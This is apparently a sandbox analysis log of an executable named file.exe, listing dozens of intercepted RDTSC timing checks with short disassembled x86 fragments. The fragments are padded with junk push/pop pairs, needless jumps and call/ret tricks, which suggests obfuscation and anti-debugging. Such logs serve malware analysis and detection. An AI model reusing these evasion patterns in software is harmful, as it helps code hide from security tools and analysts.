Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67554C second address: 675558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675558 second address: 675566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F91A12E52F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675566 second address: 6755A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F91A0D1A3D6h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 jnc 00007F91A0D1A3D6h 0x00000016 pop ebx 0x00000017 jmp 00007F91A0D1A3DDh 0x0000001c jp 00007F91A0D1A3DEh 0x00000022 pushad 0x00000023 jmp 00007F91A0D1A3DAh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6755A5 second address: 6755AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6756F6 second address: 675721 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0D1A3DEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F91A0D1A3D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F91A0D1A3D6h 0x00000018 jmp 00007F91A0D1A3E3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675CBA second address: 675CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 675CC2 second address: 675CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 679473 second address: 67947C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D5A7 second address: 67D5C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E3h 0x00000007 push eax 0x00000008 jnp 00007F91A0D1A3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67DC0A second address: 67DC1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E52FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67DD78 second address: 67DD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67DD7C second address: 67DDB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 jmp 00007F91A12E5307h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F91A12E52FAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E23A second address: 67E23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E23E second address: 67E24F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E24F second address: 67E253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E253 second address: 67E257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E257 second address: 67E25D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E25D second address: 67E263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67E263 second address: 67E279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91A0D1A3DCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6838B7 second address: 6838BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6838BB second address: 6838D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F91A0D1A3DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6838D6 second address: 6838E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F91A12E52F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6838E7 second address: 68390B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F91A0D1A3DEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647B9F second address: 647C18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F91A12E52F8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov cx, si 0x0000002b lea eax, dword ptr [ebp+12489938h] 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F91A12E52F8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jl 00007F91A12E52FCh 0x00000051 sbb edi, 02B50A02h 0x00000057 sub ecx, dword ptr [ebp+122D1BF3h] 0x0000005d mov cl, 70h 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647C18 second address: 647C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647C1C second address: 647C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647C22 second address: 647C54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0D1A3E6h 0x00000008 jmp 00007F91A0D1A3E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F91A0D1A3E3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647C54 second address: 647C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647C5A second address: 63079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0D1A3E8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F91A0D1A3D8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, edx 0x0000002a jbe 00007F91A0D1A3D9h 0x00000030 adc ch, 00000000h 0x00000033 call dword ptr [ebp+122D1A00h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647E85 second address: 647E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 647E89 second address: 647E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648133 second address: 64813D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648218 second address: 648222 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6482F7 second address: 648344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F91A12E5305h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F91A12E5300h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jnp 00007F91A12E52FEh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648344 second address: 64834E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648683 second address: 648697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648697 second address: 6486BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F91A0D1A3D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F91A0D1A3E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6486BD second address: 6486C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64879D second address: 6487A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6487A1 second address: 6487A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648CC9 second address: 648CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648CCF second address: 648CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648FC9 second address: 648FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 648FE4 second address: 649052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A12E5301h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, 40C8h 0x0000002e lea eax, dword ptr [ebp+1248997Ch] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F91A12E52F8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e nop 0x0000004f pushad 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 649052 second address: 649110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F91A0D1A3D8h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F91A0D1A3E6h 0x00000013 jmp 00007F91A0D1A3E9h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F91A0D1A3D8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jp 00007F91A0D1A3E1h 0x0000003a mov dword ptr [ebp+122D1896h], esi 0x00000040 lea eax, dword ptr [ebp+12489938h] 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F91A0D1A3D8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000019h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 nop 0x00000061 jno 00007F91A0D1A3E1h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jc 00007F91A0D1A3DCh 0x00000070 jns 00007F91A0D1A3D6h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 649110 second address: 631280 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A12E530Ah 0x00000008 jmp 00007F91A12E5304h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2FFCh], edi 0x00000030 call dword ptr [ebp+1246F73Bh] 0x00000036 jmp 00007F91A12E5309h 0x0000003b pushad 0x0000003c push edi 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 pop edi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631280 second address: 631290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631290 second address: 6312A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F91A12E52F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F91A12E52F6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6312A6 second address: 6312AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6312AA second address: 6312B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682AE3 second address: 682B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A0D1A3E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F91A0D1A3D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B03 second address: 682B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682C2C second address: 682C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F91A0D1A3DEh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F91A0D1A3D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682C4A second address: 682C50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6832A0 second address: 6832A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687D9A second address: 687D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687EEF second address: 687EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68804B second address: 688057 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A12E52FEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6881AD second address: 6881B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6881B8 second address: 6881D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F91A12E52F6h 0x0000000a jmp 00007F91A12E5304h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688731 second address: 688755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0D1A3E1h 0x00000009 jmp 00007F91A0D1A3DFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6888A3 second address: 6888AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68796B second address: 687971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687971 second address: 687987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91A12E5301h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687987 second address: 68798D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68798D second address: 687993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD05 second address: 68CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A0D1A3D6h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A0D1A3E9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD2C second address: 68CD43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F91A12E52FFh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F75B second address: 68F76A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F76A second address: 68F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F91A12E52F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691E72 second address: 691E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691E78 second address: 691EA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F91A12E5300h 0x00000008 pop ecx 0x00000009 jns 00007F91A12E5306h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691EA9 second address: 691EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91A0D1A3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691A43 second address: 691A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F91A12E52F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691BC9 second address: 691BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691BCD second address: 691BD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 698583 second address: 698588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FD6C second address: 60FD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FD70 second address: 60FD76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FD76 second address: 60FD8E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F91A12E52F6h 0x00000012 jno 00007F91A12E52F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FD8E second address: 60FD9E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697127 second address: 69712B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69712B second address: 697146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F91A0D1A3DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697146 second address: 697151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697151 second address: 697155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64893D second address: 64894B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F91A12E52FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
